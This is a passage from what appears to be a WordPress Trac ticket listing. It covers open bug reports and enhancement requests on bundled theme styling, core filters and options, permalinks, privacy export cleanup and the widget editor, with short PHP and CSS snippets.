according to what background color you applied to a group means that custom colors don't work at all, which will be more of an issue as global styles let you colorize more aspects. This was originally reported in https://github.com/WordPress/gutenberg/issues/21672." Joen Future Releases 45955 Twenty Nineteen: get_the_archive_title filter issues Bundled Theme normal normal Awaiting Review enhancement new dev-feedback 2019-01-12T05:36:49Z 2019-01-12T06:37:21Z "I was testing the theme with a plugin that adds a custom post type and allows to set a custom title for the custom post type archive view using the following filter: {{{ add_filter( 'get_the_archive_title', 'slug_set_the_archive_title' ); }}} While this filter works fine in the previous WordPress themes, such as Twenty Seventeen, Twenty Sixteen and Twenty Fifteen, it does not work in Twenty Nineteen. It's possible to fix it by setting a priority parameter in the filter. For example: {{{ add_filter( 'get_the_archive_title', 'slug_set_the_archive_title', 99 ); }}} The problem is that it breaks a header style, meaning the title will have the style of the archive view prefix text (grey color and serif font style). Any idea what is the better way to use this filter in the Twenty Nineteen theme?" taskotr Future Releases 45945 Twenty Nineteen: Consider adding a filter for the featured image color filter functionality. Bundled Theme 5.0.3 normal normal Awaiting Review enhancement new dev-feedback 2019-01-11T19:35:36Z 2023-06-21T23:03:26Z "Originally raised by @hvianna and @grapplerulrich in this GitHub thread: https://github.com/WordPress/twentynineteen/issues/722 To make it easier for child themes to disable the featured image filter built into Twenty Nineteen, it might be helpful to add a filter for that functionality. Something along the lines of: {{{ function twentynineteen_image_filters_enabled() { return apply_filters( 'twentynineteen_image_filters_enabled', 0 !== get_theme_mod( 'image_filter', 1 ) ); } }}}" kjellr Future Releases 45473 Twenty Nineteen: Avoid html code in translatable strings Bundled Theme normal normal Future Release defect (bug) new dev-feedback 2018-12-03T14:20:45Z 2023-04-28T04:05:03Z "As always only the translatable part should appear for translators to avoid issues. I came across this one: {{{#!php <span class=""meta-nav"">Published in</span><br><span class=""post-title"">%title</span> }}} " Presskopp Future Releases 45911 Twenty Nineteen: Add archive descriptions Bundled Theme 5.0.2 normal normal Awaiting Review enhancement new dev-feedback 2019-01-10T16:56:53Z 2023-04-17T11:02:28Z "Originally reported by @dannycooper in Twenty Nineteen's GitHub repo: Archive descriptions weren't originally included in the theme's design, but it's been suggested they be added now. @kjellr created a mockup of what they should look like. Original issue here: https://github.com/WordPress/twentynineteen/issues/256" laurelfulford Future Releases 60079 Twenty Fifteen: Separator block is too thick in the iframe editor Bundled Theme 6.3 normal normal Awaiting Review defect (bug) new dev-feedback 2023-12-15T04:35:20Z 2023-12-18T08:42:47Z "Steps to reproduce the issue :- 1. Activate Twenty Fifteen theme. 2. Choose separator block. 3. Now see editor and front side. You can able to see both the side block looks different. I have attached video for better understanding. Video URL :- https://share.cleanshot.com/nLtGwVmQWnDrHBvCZPV3" nidhidhandhukiya Future Releases 54120 Twenty Fifteen: Fixed table layout Bundled Theme normal minor Awaiting Review defect (bug) new dev-feedback 2021-09-14T10:44:27Z 2022-07-08T17:16:46Z "The CSS for Twenty Fifteen contains a line forcing fixed layout for tables: {{{ table { border-collapse: separate; border-spacing: 0; border-width: 1px 0 0 1px; margin: 0 0 1.6em; table-layout: fixed; /* Prevents HTML tables from becoming too wide */ width: 100%; } }}} This causes unexpected behavior since you in Gutenberg have the option to select between a fixed or dynamic layout for table blocks, but this has no effect." Roenbaeck Future Releases 56554 Twenty Eleven: Width issue in Button block Bundled Theme 6.0.2 normal normal Awaiting Review defect (bug) new dev-feedback 2022-09-12T08:14:21Z 2023-03-22T00:07:02Z "In Twenty Eleven Theme, when we add Button block in editor side and change the Width settings of Button, we can see that the Width is not reflected in editor side. Steps to replicate: 1: Activate the Twenty Eleven Theme 2: Add Button block 3: Choose Width from Width settings 4: View the page/post at editor side 5: Save Page/Post 6: View the page/post at front side For better understanding I provide video attachment link. Video link: https://share.cleanshot.com/SPJat9VXVPA8lMQUfZlD Thanks" kajalgohel Future Releases 46771 Twenty Eleven: Negative values for padding Bundled Theme 4.9.8 normal minor Awaiting Review defect (bug) new dev-feedback 2019-04-02T12:27:37Z 2023-11-08T09:50:29Z "Line 2799 #ie7 article.intro Value Error : padding-left -7.6% negative values are not allowed : -7.6% Line 2800 #ie7 article.intro Value Error : padding-right -7.6% negative values are not allowed : -7.6% " Malae Future Releases 56525 "Twenty Eleven: Font-style issue of ""Add Citation"" text in Pullquote Block" Bundled Theme 6.0 normal normal Awaiting Review defect (bug) new dev-feedback 2022-09-07T08:18:14Z 2022-09-08T13:26:13Z "In Twenty Eleven Theme, when we add Pullquote block in editor side, We can see that the font-style of ""Add citation"" text is Italic. But when we see the same Pullquote block at front side, font-style for ""Add citation"" text is not reflected, It is display normal. Steps to replicate: 1: Activate the Twenty Eleven Theme 2: Add Pullquote block 3: Enter some Text for ""Add quote"" 4: Enter some Text for ""Add citation"" 5: Save Page/Post 6: View the page/post at front side For better understanding I provide video attachment link. Video URL : https://share.cleanshot.com/yoxXVomU1svauo5FmF9G Thanks" kajalgohel Future Releases 58127 Twenty Eleven: Add escaping as per the WordPress VIP standards Bundled Theme normal normal Awaiting Review enhancement new dev-feedback 2023-04-13T14:48:47Z 2023-06-09T17:37:15Z "In the Twenty Eleven theme folder, the file named search.php has improper escaping on line number 21 as per the VIP standard. Issue screenshot: [https://share.cleanshot.com/3rPjnj33GHPcFfyL0rKh] The present line of code {{{ printf( __( 'Search Results for: %s', 'twentyeleven' ), '<span>' . get_search_query() . '</span>' ); }}} Improve line of code: {{{ printf( esc_html__( 'Search Results for: %s', 'twentyeleven' ), '<span>' . esc_html( get_search_query() ) . '</span>' ); }}}" himshekhar07 Future Releases 58375 Turn comments off by default for attachment pages (or make is easier to do so without code) Comments normal normal Awaiting Review enhancement new dev-feedback 2023-05-22T14:49:42Z 2023-05-25T07:09:59Z "If a new user is installing WordPress the first time, it lasts some time until the first spam comment appears. Typically, they now disable comments on **Settings -> Discussion**. First problem: this is just disabling the comments for ''future'' posts. Now they learn about bulk editing posts, which works fine. But the website is now online for some time and more media is uploaded, and now the spam comes to the next open comment form: **on attachment pages**. Not sure if attachment pages follow the setting from the discussion page, but there will be many media items with open comments. Now we have the second problem: On the grid view, there is no way to disable the comments at all (you need to follow a link to get to the single media edit page). On this page you need to customize the screen options to enable the meta box, and now you can disable the comments for ''this'' media item. This has to done manually for every media item with open comments (but there is no way to see if the comments are open - so you need to edit every media item). This could be a real pain for websites with many media items. **I would recommend changing the behavior and have comments on attachment pages turned off by default.** I think it will be easier to educate theme developers to turn them on again if the theme uses them (e.g. photography themes) as documented here: https://make.wordpress.org/core/2015/07/06/comments-are-now-turned-off-on-pages-by-default/ This is already discussed in the comments on this post. Related tickets: #12991 and #21391 Another way could be to use the idea of this comment: https://core.trac.wordpress.org/ticket/12991#comment:22 If turning the default to off is not possible, we could use the bulk edit to enable/disable the comment/pingback/trackback feature. The need for such a feature could be seen in the plugin directory, as there are more than one plugin for disabling comments on attachment pages (and more): https://wordpress.org/plugins/disable-comments/ https://wordpress.org/plugins/smart-attachment-page-remove/ https://wordpress.org/plugins/disable-comments-rb/ https://wordpress.org/plugins/comments-plus/ https://wordpress.org/plugins/disable-comments-on-attachments/ https://wordpress.org/plugins/disable-comments-by-click5/ https://wordpress.org/plugins/no-page-comment/ https://wordpress.org/plugins/stop-media-comment-spamming/ https://wordpress.org/plugins/disable-comments-wpz/ https://wordpress.org/plugins/disable-post-comments/ https://wordpress.org/plugins/close-comments-on-media-attachment/ These add up to more than a million active installations." zodiac1978 Future Releases 36956 Trigger event when taxonomy term is added with ajax Taxonomy normal normal enhancement new dev-feedback 2016-05-26T22:33:28Z 2019-06-04T21:23:34Z "When adding a taxonomy term via ajax, it would be nice if some JavaScript event was triggered, maybe on `.wp-list-table.tags` or the newly added row itself. This would give taxonomy term plugins some event to listen for and take action on. Something akin to: {{{ this.trigger( 'term-added' ); }}} Maybe `tag-added` is more appropriate, since all of those form elements seem to use `tag` for everything, regardless of the taxonomy." johnjamesjacoby Future Releases 45389 trackback_url_list() trackback excerpt for multibyte correspondence SergeyBiryukov Pings/Trackbacks normal normal Future Release defect (bug) reviewing needs-unit-tests 2018-11-21T08:15:18Z 2019-01-16T02:57:17Z In the case of multibyte, the last letter of the trackback excerpt may be garbled. ishitaka Future Releases 53252 Track WP-CLI version in Site Health wpscholar Site Health 5.8 normal trivial Awaiting Review enhancement assigned dev-feedback 2021-05-21T18:32:45Z 2022-09-05T21:20:07Z Currently, there is no data about WP-CLI in Site Health. Assuming that WP-CLI is present, we should display the version number in the Site Health info tab. wpscholar Future Releases 53184 Toolbar Enhancements: turn off labels / disable plugins / auto-hiding Toolbar normal normal Awaiting Review feature request new dev-feedback 2021-05-11T16:48:44Z 2021-07-14T00:10:19Z "Something that can get pretty crowded quickly is the Toolbar. I have three suggestions for improving this: - The option to turn on/off text labels next to the icons - The option to disable / enable certain plugins to add things to the toolbar - The option to enable / disable auto-hiding, where the toolbar hides until you move your mouse up (similar to what lots of people use with their Mac's dock) I'd love to hear your thoughts." tomjdevisser Future Releases 45062 tinyMCE editor breaks captions with HTML Editor 4.9.8 normal normal Awaiting Review defect (bug) new dev-feedback 2018-10-06T23:13:04Z 2019-12-19T14:27:07Z "This looks similar to ticket #18311 If I enter HTML into an image caption (eg. <ul> <span> <div> <table>, and then in tinyMCE I switch from Text to Visual, my caption breaks; sometimes it is reformmatted, sometimes the caption shortcode is removed. Test caption:[[br]] <table>[[br]] <tr><td>Label</td><td>Description</td></tr>[[br]] <tr><td><span>Text</span></td><td>More text</td></tr>[[br]] </table>" iantresman Future Releases 10660 Time zone suggester based on nascent WordPress.org API call rmccue Date/Time 2.8.4 normal normal Future Release feature request assigned dev-feedback 2009-08-20T05:59:42Z 2019-09-02T06:45:02Z "The attached patch uses a new API call to http://api.wordpress.org/core/ip-to-zoneinfo/1.0/ to retrieve a suggested time zone based on client (not server) IP address. A button is added next to the existing dropdown list of time zones providing the option to ""Suggest a time zone"". This calls the API using an AJAX/JSONP request which then auto-selects a time zone for the user from the dropdown. Visual feedback is via a spinner when fetching and then a text response. Additionally the Date and Time settings have been split out to a new settings page. Related ticket: #10324" sambauers Future Releases 46846 Tight comparisons and use of Yoda conditions are not consistent Formatting normal normal Awaiting Review defect (bug) new dev-feedback 2019-04-09T11:30:29Z 2019-04-09T11:30:29Z In `wp-includes/formatting.php`, as I have seen comparisons and use of Yoda conditions are not consistent through out the file. I have made some changes and uploading a proposed patch here. Let me know if this helps! subrataemfluence Future Releases 23060 Throw 404 if URL Rewriting is Used With Default Permalinks Permalinks 3.5 normal normal Awaiting Review enhancement reopened dev-feedback 2012-12-26T20:54:55Z 2019-04-19T15:21:06Z "Suddenly I discovered that my blog is not returning error 404 page. My blog permalink is set as default style http://test.onetarek.com/?p=123 Now I am trying to create 404 error by using this url http://test.onetarek.com/adsfjkasjdd , it showing home page. Then I tested http://test.onetarek.com/?p=123654 now it shows 404 page. Then I tried to load a not existing image http://test.onetarek.com/wp-content/themes/twentyeleven/images/headers/not-image.jpg it shows my home page instead of 404 page. I changed my permalink settings to ""Day and name"" then it show 404 page. I tested this problem in my another blog, this blog is return 404 page but that is not generated by wordpress. Wordpress 404 theme page is not being loaded. A blank page is being loaded with a message by Apache Server ""Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request...."" So what is the problem with permalink settings and 404 page." onetarek Future Releases 43360 Third parameter for get_option function to return default value instead of empty string Options, Meta APIs 4.9.4 normal normal Awaiting Review enhancement new close 2018-02-19T21:47:16Z 2022-05-26T10:20:04Z "`get_option($option, $default = false)` function returns empty string if the required field exist but doesn't contain any value e.g. NULL or empty string. For example, there is an option field 'test' exist in the option table but without any value(NULL or empty). Now `get_option('test', 'Hello World')` function will return an empty string as it is; from the database but developer may be expecting ""Hello World"" in return. To avoid this situation third parameter may be introduced for `get_option()` function which will decide to return NULL/empty-string or default value. Here is my proposed solution `get_option( $option, $default = false, $return_null = true)` Now calling `get_option('test', 'Hello World', false)` function for above problem will return default value which is '''Hello World'''. wp-includes\options.php file requires little changes to address the above enhancement." farhan.noor Future Releases 13816 There should be built-in index pages for taxonomies Taxonomy normal normal Future Release feature request new dev-feedback 2010-06-10T12:20:29Z 2023-01-31T20:36:11Z "By default, if you enable 'pretty' permalinks, you get URLs like this for categories and tags: /category/slug, /tag/slug. The same pattern is used when adding custom taxonomy types. These URLs often suggest to people that it should be possible to go 'up' one level, and access index pages at /category and /tag which list all of the available categories or tags (or maybe just the top x most popular ones for tags). I'd suggest that we add a new template type of is_archive_index() which uses, in order of preference, taxononmyname-index.php (eg category-index.php), archive-index.php. Within these templates, the 'loop' should return taxonomy items rather than posts. This is all possible already using custom templates and get_terms(), but it'd be handy if it was built-in. " frankieroberto Future Releases 29009 "There should be a capability for ""publish private posts""" Role/Capability 3.9.1 normal normal enhancement reopened dev-feedback 2014-07-23T15:48:00Z 2019-06-04T21:12:02Z "I've been working on a simple membership site with only two membership levels: logged in and logged out, which is a situation that theoretically could be easily managed in WP without any plugins. However, logged in members should not be able o post publicly, while they are allowed to post whatever they want inside the membership walls, so the review system doesn't help in this situation either. Currently, I have to use a custom post type and force the status to private on publishing with a plugin to achieve the intended scenario. But I think the most parsimonious solution would be to include a capability that would allow people to ""publish_private_posts"" yet not ""publish_posts""." t.schwarz Future Releases 49429 There seems to be no way to check query value for NULL Query 5.3.2 normal normal Awaiting Review enhancement new dev-feedback 2020-02-14T04:56:53Z 2020-02-14T12:29:13Z "NOT EXISTS and EXISTS both don't do what I want I want to check `WHERE meta_value IS NOT NULL` exists does this, applied to meta field related_post_id2: ` ""where"" ""mt5.meta_key = 'related_post_id2'"" ""join"" "" INNER JOIN wp_2_postmeta AS mt5 ON ( wp_2_posts.ID = mt5.post_id )"" ` that is not what I want NOT EXISTS does: ` ""where"" ""mt5.post_id IS NULL"" ""join"" "" LEFT JOIN wp_2_postmeta AS mt5 ON (wp_2_posts.ID = mt5.post_id AND mt5.meta_key = 'related_post_id2' )"" ` well, thats not what I want either, because now it checks ""if there is a row with related_post_id2"". I want ""A row where the meta_value is not null"" in reality what I want is Any entry, that has: No value for related_post_id2 empty string for related_post_id2 or null for related_post_id2 does that make sense? " Jossnaz Future Releases 26695 Themes: add support for multiple screenshots in themes Themes 3.8 normal normal Future Release enhancement new dev-feedback 2013-12-20T20:08:43Z 2020-08-14T05:06:12Z "We left this out from the THX merge due to priorities. Let's bring them back. Previously: #20546. * Method to get an array with all the screenshots with a maximum of 5. * Pass this data to {{{wp_prepare_themes_for_js}}}. * Adjust template to loop through all the screenshots (if available) and render them. * Set up a simple JS gallery with thumbnails on the detailed view of a theme. Array begins with screenshot.png as the first item, then continues with screenshot-2.png." matveb Future Releases 59538 Theme update message showing user wrong theme popup Themes 6.3.2 normal normal Awaiting Review defect (bug) new dev-feedback 2023-10-04T11:47:21Z 2023-10-06T11:54:22Z "When you are updating the theme and another theme popup is opened then the theme updated message shows on the opened popup twice message. Video link: https://www.awesomescreenshot.com/video/21305588?key=95614ad9bc790ca5d1a26fa52a2e75e9" praful2111 Future Releases 39167 Theme mods should be able to be gotten/changed on inactive themes. Themes 2.1 normal normal Awaiting Review enhancement new dev-feedback 2016-12-07T22:37:54Z 2019-03-15T02:06:13Z "Currently, there is no way (short of direct option queries) to get theme mods of an inactive theme. This can be problematic when a user wants to see what changes they had configured on a parent theme, when on a child theme, or when trying to see the other theme mods they had configured elsewhere. This change moves the bulk of the theme mod functions to be methods on the `WP_Theme` class -- so if you `wp_get_theme()` any theme -- active or inactive -- you can view and change its mods. The attached changeset also converts the existing legacy methods to use the new versions on the current theme. Related: [4401]" georgestephanis Future Releases 29555 Theme details allowed HTML Themes 3.9 normal normal defect (bug) new dev-feedback 2014-09-06T11:50:17Z 2019-06-04T21:12:13Z "Theme authors can use some HTML in their theme's style.css Description (and Theme Name and Author). If I'm not wrong, sanitize_header() in WP_Theme class sets the allowed HTML tags and attributes and for Description they are: {{{ 'a' => array( 'href' => true, 'title' => true ), 'abbr' => array( 'title' => true ), 'acronym' => array( 'title' => true ), 'code' => true, 'em' => true, 'strong' => true, }}} This works in the installed themes browser, where theme details are grabbed from the theme's style.css. But in the theme install views, where theme details come from WordPress.org API, some HTML tags (for example ""a"") are completely stripped out (don't know if this is intentional) while others (for example ""abbr"") are not unencoded before being used as HTML in the view and they end up being displayed as plain text, even in the WordPress.org site (see the last two screenshot). I've found the someway related #27641 but please notice HTML is returned by the API already encoded so even using triple braces `>` etc. will still be `>` Installed themes browser: [[Image(http://i.imgur.com/B9TdIUa.png)]] Themes install: [[Image(http://i.imgur.com/JoP1yjp.png)]] WordPress.org themes site: [[Image(http://i.imgur.com/fyYmdeK.png)]]" afercia Future Releases 42486 The Tools screen is blank for users who cannot manage categories or tags Administration 4.9 normal normal Awaiting Review defect (bug) assigned dev-feedback 2017-11-09T17:05:12Z 2024-01-17T17:05:15Z "Since Press This was removed in #41689, the Tools screen is only composed of the Categories and Tags Converter. For users who can't manage categories or tags (Authors and Contributors), the Tools screen is now completely empty. Subscribers currently don't see the Tools admin menu item. The Tools admin menu item should be removed if there's nothing to display on it." johnbillion Future Releases 18322 The Road to Magic Quotes Sanity jorbin Bootstrap/Load 3.2.1 normal normal Future Release defect (bug) reopened dev-feedback 2011-08-03T20:26:25Z 2023-06-26T20:19:27Z For back compat reasons, wp_magic_quotes() performs addslashes() on GPCS data. This is a pain, especially given that some core API expects slashes and some doesn't. In hopes of someday losing the automatic GPCS slashing, let's introduce a flag to turn off the slashing as well as slash and unslash functions that consult the flag. If slashing is on, these functions add and strip slashes. If slashing is off, they return data unchanged. Plugin authors can start using these functions and testing their code with GPCS slashing turned off and on. Eventually, GPCS slashing would default to off and all calls to the slash and unslash functions could be removed from core. ryan Future Releases 59802 The quote block Add Citation text color issue into the theme Twenty Fifteen Themes 6.3.2 normal normal Awaiting Review defect (bug) new dev-feedback 2023-11-03T09:51:33Z 2023-11-03T09:51:33Z "Hello Team, I have worked on the **""Quote""** block and found that its ""Add Citation"" text color is not changed when we try to set it from the block setting. Here, I have attached its video. **Issue: [https://share.cleanshot.com/c5VnwHz1Qt34NPXcHw9f]** Thanks," viralsampat Future Releases 59801 The pullquote block text color and border issue into the theme Twenty Fifteen Themes 6.3.2 normal normal Awaiting Review defect (bug) new dev-feedback 2023-11-03T09:43:15Z 2023-11-03T09:43:15Z "Hello Team, I have worked on the **""Pullquote""** block into the ""Twenty Fifteen"" theme and found that the text color for admin is not changed. Here, I have attached its video. **Issue: [https://share.cleanshot.com/2QPVLc7H737ghxjw8lft]** Thanks," viralsampat Future Releases 48265 The privacy export files cleanup can run unlink on directories throwing an error. Privacy 4.9.6 normal normal Awaiting Review defect (bug) new dev-feedback 2019-10-09T18:02:19Z 2021-11-24T09:25:40Z "Looking into some test failures on VVV flagged in Slack here; https://wordpress.slack.com/archives/C02RQBWTW/p1570445063460400 It was found that the `wp_privacy_delete_old_export_files` function runs `unlink` on all files and subdirectories older than `wp_privacy_export_expiration`, this becomes an issue as directories can't be removed via `unlink` and will throw an Operation is not permitted error. This occurs as the `$export_files` list is collected from a `list_files` call which has a level of 100 resulting in subdirectories being included. So the question for me is should the export cleanup only do files in the current `$export_dir`, or should it recurse into subdirectories and if so should the directories also be cleaned up if older than `wp_privacy_export_expiration`. If we do go to the extent of removing subdirectories should the `list_files` call be updated with an exclude filter so plugins can have custom directories in that location which would be avoided during the cleanup? Note: If subdirectories are to be removed as well we'll have to recursively traverse them and remove their contents so `rmdir` will work. Along with addressing the issue in `wp_privacy_delete_old_export_files` the cause of the original VVV test failures should also be addressed. What lies in the privacy unit test that creates the test_contents folder but doesn't clean it up here; https://github.com/WordPress/wordpress-develop/blob/master/tests/phpunit/tests/privacy/wpPrivacyGeneratePersonalDataExportFile.php#L244 * simply removing this directory at the end of the test should suffice." garrett-eclipse Future Releases 54983 The post has already been deleted. Posts, Post Types 5.4 normal normal Future Release defect (bug) new dev-feedback 2022-01-29T04:22:49Z 2022-10-07T21:37:04Z "Hi, One big issue on 5.9 . when i have deleted post then still on post page & getting error message ""The post has already been deleted."". So i think after delete post need to redirect page on post list? More infomation you can see below mentioned quick video. https://www.loom.com/share/616020077274422c8d90771034d22aff" sumitsingh Future Releases 43893 The maybe_create_table() function has two definitions Database low normal Awaiting Review defect (bug) new dev-feedback 2018-04-28T14:22:56Z 2020-09-01T16:05:56Z "The `maybe_create_table()` function has two definitions: 1. https://github.com/WordPress/wordpress-develop/blob/c71a898f784d8435c07bcf9ec9e30560dd3abe19/src/wp-admin/includes/upgrade.php#L2187-L2219 2. https://github.com/WordPress/wordpress-develop/blob/c71a898f784d8435c07bcf9ec9e30560dd3abe19/src/wp-admin/install-helper.php#L40-L70 The latter is contained within a `function_exists()` check, but this still means the function's behaviour can differ depending on which definition happens to load. The function is not used at all in WordPress core. It (they?) should probably be deprecated." johnbillion Future Releases 55878 The Manage Themes Screen Needs to Indicate Clear User Actions Themes normal normal Awaiting Review enhancement new dev-feedback 2022-05-30T19:34:11Z 2022-05-31T23:13:04Z "**What problem does this address?** A new user might not understand the difference between uploading a theme and browsing the theme repository. To make it easier for new users to use WordPress, user actions should be clearer. **What is your proposed solution?** [[Image(the-problem_add-new-theme.png)]] - The Add New isn't descriptive of the action the user should it. The text on the button should be changed to ""Browse WordPress Themes"". - Manage Themes should be changed to My Themes to indicate to the user these are the themes they have installed on their website. - A button should be added that allows the user to upload a theme. It should say ""Upload Theme"". - The button that says ""Add New Theme"" should be changed to ""Browse WordPress Themes"" so the user understands the button is not for uploading WordPress themes but to browse themes. Originally posted here: https://github.com/WordPress/gutenberg/issues/41244" deborah86 Future Releases 58884 "The image size for the Site Logo block is hard coded to ""full""" audrasjb* General normal normal Awaiting Review enhancement accepted close 2023-07-23T19:41:10Z 2023-09-20T08:27:57Z "The recommended size for the site icon is 512x512. The Site Logo block is coded to use the ""full"" size, in general-templates.php: {{{ $image = wp_get_attachment_image( $custom_logo_id, 'full', false, $custom_logo_attr ); }}} If the icon is at the recommended size of 512x512, the full size is much too big for the common use of the Site Logo block (in the header). That leads to a ""Properly size images"" warning in page-speed tools." asafm7 Future Releases 55996 the get_the_block_template_html call all the same functions as the the_conent filter so they are run twice flixos90 Formatting normal normal Future Release defect (bug) assigned dev-feedback 2022-06-16T22:23:50Z 2024-03-13T15:42:08Z "In get_the_block_template_html we have this code {{{#!php <?php $content = $wp_embed->run_shortcode( $_wp_current_template_content ); $content = $wp_embed->autoembed( $content ); $content = do_blocks( $content ); $content = wptexturize( $content ); $content = convert_smilies( $content ); $content = shortcode_unautop( $content ); $content = wp_filter_content_tags( $content ); $content = do_shortcode( $content ); $content = str_replace( ']]>', ']]>', $content ); }}} These are direct calls to the same functions as used by the filter the_content {{{#!php <?php add_filter( 'the_content', 'do_blocks', 9 ); add_filter( 'the_content', 'wptexturize' ); add_filter( 'the_content', 'convert_smilies', 20 ); add_filter( 'the_content', 'wpautop' ); add_filter( 'the_content', 'shortcode_unautop' ); add_filter( 'the_content', 'prepend_attachment' ); add_filter( 'the_content', 'wp_filter_content_tags' ); add_filter( 'the_content', 'wp_replace_insecure_home_url' ); }}} So they are been run twice for site content " pbearne Future Releases 55563 The function get_allowed_mime_types should check wp_get_current_user Formatting 5.9.3 normal normal Awaiting Review defect (bug) new dev-feedback 2022-04-12T10:19:16Z 2022-04-12T18:53:52Z "The function get_allowed_mime_types checks if the function current_user_can before using it, as you can see at https://developer.wordpress.org/reference/functions/get_allowed_mime_types/. The function current_user_can calls wp_get_current_user, as you can see at https://developer.wordpress.org/reference/functions/current_user_can/ If the function get_allowed_mime_types is called when wp_get_current_user doesn't exist yet, it triggers a fatal error. I think get_allowed_mime_types should check also if wp_get_current_user exist. I would write something like this: {{{#!php <?php function get_allowed_mime_types( $user = null ) { $t = wp_get_mime_types(); unset( $t['swf'], $t['exe'] ); if ( function_exists( 'current_user_can' ) && function_exists( 'wp_get_current_user' ) ) { $unfiltered = $user ? user_can( $user, 'unfiltered_html' ) : current_user_can( 'unfiltered_html' ); } if ( empty( $unfiltered ) ) { unset( $t['htm|html'], $t['js'] ); } /** * Filters list of allowed mime types and file extensions. * * @since 2.0.0 * * @param array $t Mime types keyed by the file extension regex corresponding to those types. * @param int|WP_User|null $user User ID, User object or null if not provided (indicates current user). */ return apply_filters( 'upload_mimes', $t, $user ); } }}} The function wp_get_current_user is defined in wp-includes/plugguble.php, so after all, plugins are loaded. This means that if you call sanitize_file_name inside a nu-plugin, or before the action 'plugin_loaded', you have the fatal error." giuse Future Releases 44157 the comments/[id] endpoints should have the same permissions checks as the comments endpoint REST API normal normal Future Release defect (bug) new dev-feedback 2018-05-19T21:18:59Z 2019-06-20T18:10:04Z "I noticed this because custom comment types don't show up on the `comments` endpoint but it's possible to access them via their id in `comments/[comment_id]`. `get_item_permissions_check` should do the same checks as `get_items_permissions_check` in `WP_REST_Comments_Controller`" tharsheblows Future Releases 33909 The `home` option not equivalent to the WP_HOME constant value in multisite and single instance Upgrade/Install 3.0 normal normal Awaiting Review defect (bug) new dev-feedback 2015-09-17T07:41:18Z 2022-12-03T19:16:01Z "Hi, for this issue, I'm running a multisite instance with custom WordPress and wp-content directory paths where I set the constants '''WP_SITEURL''' and '''WP_HOME''' values as follow: * WP_HOME: http://mydomain.com/ * WP_SITEURL: http://mydomain.com/cms (where WordPress is installed) All the process during the installation is working perfectly and the multisite instance is installed as expected...except when you click on the admin toolbar button '''Visit site''' for example. Here is the issue, the site URL is set as '''http://mydomain.com/cms''' where it should be '''http://mydomain.com'''. This issue is becoming a user experience issue because both URLs with and without the '''cms''' URI are working. But all anchor tags href attribute have the wrong value. When looking at the database '''wp_options''' table, we can see that both '''home''' and '''siteurl''' options have a value of '''http://mydomain.com/cms''' which should only be '''siteurl''' with this value. I'm filling this issue mainly for multisite because the anchor tags used to visit the site have the wrong value but note that even for single WordPress installation, the options values are wrong in the '''wp_options''' table. Both have the same value where only the '''siteurl''' should get '''cms''' URI in this example. But when you're on a single instance all anchor tags href attributes have the correct URL in order to visit the site where in multisite they are wrong. So there are 2 things to look at here probably: * First why the '''wp_options''' values are not equal to the set constants '''WP_HOME''' and '''WP_SITEURL'''? * Second, why in a single instance URLs are correct (even if values in the database are wrong) and not on multisite? Best regards" jlambe Future Releases 24415 The 'show_in_admin_all_list' argument for the 'register_post_status' function is ignored when the argument 'public' is set to 'false' Posts, Post Types 3.5.1 normal normal defect (bug) new dev-feedback 2013-05-25T00:06:51Z 2023-05-24T16:08:16Z "Hello, I stumbled upon a bug in the admin section of WordPress. I'm currently running the latest release (3.5.1) without any third-party plugins. After creating some custom post statuses via the 'register_post_status' function, I noticed that posts with them do not appear in the default (all) post listing in the admin section, despite me setting the 'show_in_admin_all_list' argument to 'true'. I narrowed this problem down only to the 'public' argument of the same ('register_post_status') function: if the 'public' argument of custom post status is set to 'true', then everything works as expected and the posts with a custom post status appear in the default (all) post listing in the admin section — but this also makes posts with that custom post status appear to the regular users, making them public, hence the name of the argument. It's worth noting that the 'public' argument has no such buggy effect on the 'show_in_admin_status_list' argument of the same ('register_post_status') function: it doesn't matter to what the 'public' argument is set — the links to the appropriate post statuses are showed at the top of the post listing only based on the 'show_in_admin_status_list' argument, just like it should." XyntaMan Future Releases 53625 The 'explode' function does not work on widget block editor. Widgets 5.8 normal major defect (bug) reopened dev-feedback 2021-07-08T13:47:39Z 2021-07-16T14:08:03Z "The `explode()` function does not seem to be working on the new Widget block editor. I am testing it on the RC-2 version. I have created a simple widget that accepts Title, Description, and multiple selections from a Checkbox list items (Screenshots attached) On selecting checkboxes, the values form a comma-separated string (e.g. 123456, 9822310, 457790 etc.) and stored in a textbox. Inside the `update()` function, I am exploding this string and storing the array as `$instance['groups']` element, which in turn gets saved in the database (`wp_options` table). The functionality works as expected if I have the `widgets-block-editor` support disabled. But when enabled, the `explode()` function is not working and nothing is in `$instance['groups]`. {{{#!php <?php public function update( $new_instance, $old_instance ) { $instance = $old_instance; $instance['title'] = strip_tags( $new_instance['title'] ); $instance['about'] = strip_tags( $new_instance['about'] ); $groups = $new_instance['groups']; // the following line is not working and creating an empty array // when widgets-block-editor support is enabled. $instance['groups'] = array_pop ( explode( ',', $groups ) ); return $instance; } }}} Database: {{{ a:2:{i:2;a:3:{s:5:""title"";s:15:""Product Channel"";s:5:""about"";s:41:""When you subscribe to our Product Channel"";s:6:""groups"";a:3:{i:0;s:6:""237500"";i:1;s:6:""457844"";}}s:12:""_multiwidget"";i:1;} }}} However, the values get stored with block editor support enabled as a comma-separated string without the `explode()` function, i.e. {{{#!php <?php public function update( $new_instance, $old_instance ) { $instance = $old_instance; $instance['title'] = strip_tags( $new_instance['title'] ); $instance['about'] = strip_tags( $new_instance['about'] ); $instance['groups'] = $new_instance['groups']; return $instance; } }}} " subrataemfluence Future Releases 49086 "The ""site_icon"" option isn't always removed when the site icon is deleted" Media normal normal Awaiting Review defect (bug) new dev-feedback 2019-12-27T17:38:05Z 2022-01-06T02:32:21Z "If you delete the site icon image by going to Media > Library, the ""site_icon"" option isn't deleted from the database. Note the option is deleted if you go Appearance > Customize and remove the icon through the Site Identity tab." henry.wright Future Releases 42695 Text Widget: hard-coded width/height attributes are stripped from iframes Widgets 4.9 normal normal Future Release defect (bug) new dev-feedback 2017-11-25T04:30:54Z 2018-05-02T15:01:49Z "hi when i update my WordPress 4.9 my exiting iframe size in text widget not working.please find my [http://dubaicarmelschool.com/] and iframe code below: <iframe src=""sshow/show.html"" border=""0"" width=""700"" height=""400""style=""border: 0; margin-left: -120px; margin-right: -0px; margin-top: -9px; margin-bottom: -0px;""></iframe>" dubaicarmelschool Future Releases 27307 Text Widget size spill over the side of Widget Container in random width. Widgets 3.8.1 normal normal Awaiting Review defect (bug) new dev-feedback 2014-03-06T22:41:03Z 2017-05-26T13:45:11Z "About 75 percent of the time when I add a text widget item to a widget area. The widget spills over the left side of the area. See 